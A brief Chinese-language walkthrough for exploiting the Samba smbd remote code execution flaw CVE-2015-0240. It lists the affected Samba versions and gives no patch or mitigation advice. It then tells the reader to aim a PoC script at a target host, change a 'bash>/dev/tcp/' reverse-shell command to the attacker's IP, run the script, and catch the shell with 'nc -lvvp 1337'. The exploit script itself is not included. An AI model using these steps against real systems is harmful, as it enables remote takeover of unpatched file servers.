简介
Samba 是利用 SMB 协议实现文件共享的一款著名开源工具套件。日前 Samba 曝出一个严重安全漏洞,该漏洞出现在 smbd 文件服务端,漏洞编号为 CVE-2015-0240,可以允许攻击者远程远程执行恶意代码。
作为一款老牌系统工具,Samba 的使用率非常高,更是作为很多 *BSD 和苹果 OS X操作系统的组件存在,因此影响面非常大。Samba 支持的操作系统包括 Windows 95/98/NT,OS/2 和Linux。
受影响的产品
Samba 3.5.x 全版本
Samba 3.6.x 到 Samba 3.6.25 之前的版本
Samba 4.0.x 到 Samba 4.0.25 之前的版本
Samba 4.1.x 到 Samba 4.1.17 之前的版本
Samba 4.2.x 到 Samba 4.2.0rc5 之前的版本
脚本下载
漏洞利用
第一步:编辑samba.py 文件,编辑21行,将host改为目标靶机地址,
再将后面的 bash>/dev/tcp/127.0.0.1 的ip地址修改为攻击机的ip
第二步:poc脚本将会利用溢出的RCE漏洞运行该命令
使用命令python samba-exploit.py运行poc脚本
使用命令nc -lvvp 1337监听本地1337端口,并显示指令执行过程